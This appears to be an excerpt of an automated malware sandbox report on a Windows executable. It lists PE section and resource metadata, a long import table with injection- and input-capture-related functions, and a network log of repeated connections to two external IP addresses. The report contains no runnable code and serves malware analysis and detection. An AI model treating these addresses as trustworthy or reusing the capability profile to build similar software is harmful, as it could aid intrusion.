                                                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xd40000x3d4780x3d60063b2868add101ae138f2fa4f40774c6cFalse0.8921803398676171data7.809273577814519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1120000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                        RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xdc7b80x34740data1.0003537384569556
                                                        RT_GROUP_ICON0x110ef80x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x110f700x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x110f840x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x110f980x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x110fac0xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x1110880x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 8, 2024 13:59:12.632882118 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:12.811760902 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:12.811991930 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:12.812274933 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:12.991117001 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:13.127237082 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:13.175162077 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:13.321785927 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:13.500679016 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:13.508291006 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:13.550195932 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:14.531517982 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:14.531557083 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:14.531619072 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:14.685353041 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:14.685386896 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:14.946806908 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:14.946933031 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:14.985507011 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:14.985537052 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:14.985790968 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:15.034547091 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:15.185969114 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:15.232234001 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:15.320166111 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:15.320307016 CEST44349738172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:15.320456982 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:15.584688902 CEST49738443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:15.666697979 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:15.885596037 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:15.940800905 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.029479980 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.029509068 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.029620886 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.029942036 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.029953957 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.288114071 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.290956020 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.290992022 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.588903904 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.589003086 CEST44349739172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:16.589046955 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.589586020 CEST49739443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:16.593166113 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.594477892 CEST4974080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.776196003 CEST8049740158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:16.776340961 CEST4974080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.776511908 CEST4974080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.785729885 CEST8049737158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:16.785831928 CEST4973780192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:16.955636978 CEST8049740158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:17.181565046 CEST8049740158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:17.182904005 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.182935953 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.183015108 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.183271885 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.183286905 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.222132921 CEST4974080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:17.440624952 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.442293882 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.442322016 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.739309072 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.739418983 CEST44349741172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:17.739479065 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.739912033 CEST49741443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:17.757127047 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:17.937038898 CEST8049742158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:17.937133074 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:17.937311888 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.116170883 CEST8049742158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:18.119434118 CEST8049742158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:18.120605946 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.120630980 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.120693922 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.121021032 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.121027946 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.159521103 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.395477057 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.397247076 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.397268057 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.699667931 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.699812889 CEST44349743172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:18.699861050 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.700406075 CEST49743443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:18.705539942 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.706899881 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.886428118 CEST8049744158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:18.886548996 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.886874914 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:18.887924910 CEST8049742158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:18.888021946 CEST4974280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:19.066397905 CEST8049744158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:19.564827919 CEST8049744158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:19.566276073 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:19.566317081 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:19.566405058 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:19.566652060 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:19.566667080 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:19.612659931 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:19.823273897 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:19.824842930 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:19.824868917 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:20.122843027 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:20.122951984 CEST44349745172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:20.123017073 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:20.123471022 CEST49745443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:20.126473904 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:20.127545118 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:20.307097912 CEST8049746158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:20.307256937 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:20.307406902 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:20.318993092 CEST8049744158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:20.319081068 CEST4974480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:20.486895084 CEST8049746158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.049896002 CEST8049746158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.051014900 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.051053047 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.051115036 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.051328897 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.051340103 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.097038031 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.308262110 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.309787035 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.309803963 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.609461069 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.609613895 CEST44349747172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.609679937 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.610192060 CEST49747443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.613312960 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.614454031 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.792870998 CEST8049746158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.792932987 CEST4974680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.793803930 CEST8049748158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.794889927 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.795017958 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:22.974023104 CEST8049748158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.974997044 CEST8049748158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:22.976326942 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.976356030 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:22.976425886 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.976651907 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:22.976664066 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.019191027 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.235800028 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.237504959 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.237549067 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.534223080 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.534336090 CEST44349749172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.534409046 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.535057068 CEST49749443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.543961048 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.545182943 CEST4975080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.724642038 CEST8049750158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:23.724766016 CEST4975080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.724900007 CEST4975080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.729135990 CEST8049748158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:23.729202032 CEST4974880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:23.904011011 CEST8049750158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:23.979584932 CEST8049750158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:23.980741978 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.980777979 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:23.980844021 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.981087923 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:23.981100082 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:24.018981934 CEST4975080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:24.238625050 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:24.240109921 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:24.240134001 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:24.537631035 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:24.537770033 CEST44349751172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:24.537815094 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:24.538275957 CEST49751443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:24.549909115 CEST4975080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:24.733479023 CEST8049750158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:24.733527899 CEST4975080192.168.2.4158.101.44.242
